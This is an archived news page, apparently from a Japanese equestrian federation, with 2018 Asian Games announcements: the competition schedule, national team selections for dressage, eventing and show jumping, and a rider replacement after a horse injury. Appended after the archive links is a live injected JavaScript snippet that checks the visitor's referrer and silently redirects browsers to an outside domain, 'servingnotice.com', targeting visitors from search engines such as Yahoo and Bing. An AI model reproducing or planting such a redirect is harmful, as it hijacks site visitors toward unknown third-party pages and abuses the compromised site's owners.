アーカイブ:

アジア競技大会
2018 年 8 月 19 日
《アジア大会》馬術競技明日開幕!
 《第18回アジア競技大会》馬術競技が、明日、ジャカルタで開幕します。馬術競技の全日程は以下の通りです。

 8月20日(月) 馬場馬術 団体戦(表彰式)
 8月21日(火) 馬場馬術 個人戦第1競技
 8月23日(水) 馬場馬術 個人戦第2競技(表彰式)
 8月24日(金) 総合馬術 馬場馬術
 8月25日(土) 総合馬術 クロスカントリー
 8月26日(日) 総合馬術 障害馬術(表彰式)
 8月27日(月) 障害馬術 第1次予選
 8月28日(火) 障害馬術 団体戦2回走行(表彰式)
 8月30日(木) 障害馬術 個人戦2回走行(表彰式)



 今日は馬場馬術のホースインスペクションが行われ、全頭合格しました。明日の団体戦のチーム内オーダーは、高橋正直&ファブリアーノ58、照井駿介&アリアス・マックス、佐渡一毅&ジュース、黒木茜&トゥッツとなりました。スタートリストは大会公式サイトでご覧いただけます。


大会公式サイトはこちらから


 
aaaa
アジア競技大会
2018 年 8 月 9 日
アジア大会障害馬術代表選手交代のお知らせ
《第18回アジア競技大会(2018/ジャカルタ・パレンバン)》の障害馬術競技代表選手について、出場を辞退した林忠寛選手とコラナズエムアンドエム号から桝井俊樹選手とカルタゲーナ6号(乗馬クラブクレイン)への交代が正式に承認されました。
障害馬術は以下の4人馬でアジア大会に臨みます。


【障害馬術競技】(50音順)
御護守 将太 / SIGアイアンマン (藤沢乗馬クラブ)
杉谷 泰造 / ヒロインデミューズ (杉谷乗馬クラブ)
福島 大輔 / コーネット36 (STAR HORSES)
桝井 俊樹 / カルタゲーナ6 (乗馬クラブクレイン)


障害馬術日程: 8月27日~30日




 
aaaa
アジア競技大会
2018 年 7 月 19 日
アジア大会障害馬術代表選手辞退のお知らせ
《第18回アジア競技大会(2018/ジャカルタ・パレンバン)》の障害馬術競技代表選手に決定していた林忠寛選手とコラナズエムアンドエム号のコンビは、馬の負傷により出場を辞退することとなりました。
そのため補欠の桝井俊樹選手とカルタゲーナ6号(乗馬クラブクレイン)への交代をJOCへ申請いたしました。
承認され次第改めてお知らせいたします。


 
aaaa
アジア競技大会
2018 年 6 月 19 日
《第18回アジア競技大会》障害馬術 代表候補決定
 《第18回アジア競技大会(2018/ジャカルタ・パレンバン)》障害馬術競技について、下記の選手を日本代表としてJOCに推薦することを決定いたしました。

【障害馬術競技】(50音順)
御護守 将太 / SIGアイアンマン (藤沢乗馬クラブ)
杉谷 泰造 / ヒロインデミューズ (杉谷乗馬クラブ)
林 忠寛 / コラナズエムアンドエム (北総乗馬クラブ)
福島 大輔 / コーネット36 (STAR HORSES)

[補欠]
桝井 俊樹 / カルタゲーナ6 (乗馬クラブクレイン)

監督:東良 弘一









 
aaaa
アジア競技大会
2018 年 6 月 6 日
《第18回アジア競技大会》馬場馬術および総合馬術 代表候補決定
 《第18回アジア競技大会(2018/ジャカルタ・パレンバン)》馬場馬術競技および総合馬術競技について、6月6日に開催した平成30年度第2回定例理事会において、下記の選手を日本代表としてJOCに推薦することを決定いたしました。

【馬場馬術競技】(50音順)
黒木 茜/トゥッツ
佐渡 一毅/ジュース (日本中央競馬会)
高橋 正直/ファブリアーノ58 (伊香保バーデンファーム)
照井 駿介/アリアス・マックス (ドレッサージュ・ステーブル・テルイ)

監督:照井 愼一

【総合馬術競技】(50音順)
大岩 義明/バートエルJRA (株式会社nittoh)
北島 隆三/ココドロ (乗馬クラブクレイン)
平永 健太/デラーゴ (乗馬クラブクレイン)
弓良 隆行/ポーチャーズホープ (乗馬クラブクレイン)

〔補欠〕
根岸 淳/ヴェンチュラJRA (乗馬クラブクレイン)

監督:細野 茂之


なお、障害馬術競技につきましては、6月中旬以降に改めて発表する予定です。

 
aaaa
アジア競技大会
2018 年 5 月 29 日
《アジア大会》馬場代表人馬選考会 最終成績発表
 第18回アジア競技大会(2018/ジャカルタ・パレンバン)馬場馬術代表人馬選考競技会(ドイツ会場/日本会場)の最終成績を発表いたします。

最終成績表(PDF)

なお、アジア競技大会の馬場馬術の代表人馬は6月6日(理事会承認後)に発表予定です。

《日本会場成績》
日本会場1日目成績表(PDF)
日本会場2日目成績表(PDF)

《ドイツ会場成績》
ドイツ会場1日目成績表(PDF)
ドイツ会場2日目成績表(PDF)



 
aaaa
アジア競技大会
2018 年 5 月 21 日
第18回アジア競技大会 障害馬術ショートリスト発表!
8月18日から9月2日まで、ジャカルタ・インドネシアにて行われますアジア競技大会の障害馬術ショートリストを発表いたします。 


 第18回アジア競技大会   <障害馬術競技>    ショートリスト

                               2018.5.21発表
                             *五十音順
 
選 手 名 馬 名 所 属
御護守 将太 SIGアイアンマン 藤沢乗馬クラブ
杉谷 泰造 ヒロインデミューズ 杉谷乗馬クラブ
林 忠寛 コラナズエムアンドエム 北総乗馬クラブ
福島 大輔 コーネット36 STAR HORSES
ポーリー カレン ウィズウィングス
サリ
木下グループ
桝井 俊樹 カルタゲーナ6 乗馬クラブクレイン
吉澤 彩 コンラト ヨシザワライディングファーム

 
aaaa
アジア競技大会
2018 年 5 月 15 日
《全日本ヤング総合》大会スケジュール発表
 5月25日(金)~27日(日)に、山梨県馬術競技場にて行ないます《第39回全日本ヤング総合馬術大会/CCI 1* Yamanashi 2018》の大会スケジュールをお知らせいたします。

PDF閲覧はこちらから
《 第39回全日本ヤング総合馬術大会 2018/CCI1*Yamanashi2018》大会スケジュール(PDF)
※スケジュールは変更することがあります。
※打合せ会での決定事項を最優先します。
 
aaaa
アジア競技大会
2018 年 5 月 8 日
《アジア大会》馬場馬術代表人馬選考競技会出場人馬リスト
5月22日(火)~29日(火)に実施する第18回アジア競技大会(2018/ジャカルタ・パレンバン)馬場馬術代表人馬選考競技会(ヨーロッパ会場/日本会場)の出場人馬リストを掲載いたします。

馬場馬術代表人馬選考競技会出場人馬リスト(PDF)



 
aaaa
アジア競技大会
2018 年 4 月 27 日
《アジア大会》 総合馬術代表人馬選考対象競技会(国外)(変更)
《第18回アジア競技大会(2018/ジャカルタ・パレンバン)》総合馬術代表人馬選考基準に基づき、国外を拠点とする人馬の競技会出場計画を発表します(一部変更につき2018/04/27再掲載)。

出場計画はこちらをご覧ください。(PDF)
 
aaaa
 

アーカイブ:

  • 2018.08.10
  • 2018.08.19
  • 2018.08.19
  • 2018.08.19
  • 2018.08.17
  • 2018.08.10
  • 2018.08.19
  • 2018.08.17
  • 2018.08.07
  • 2018.07.19
  • 2018.07.02
  • 2018.06.04
  • 2018.08.14


var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/lvinter2/intermediary.html?outlet80com"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl;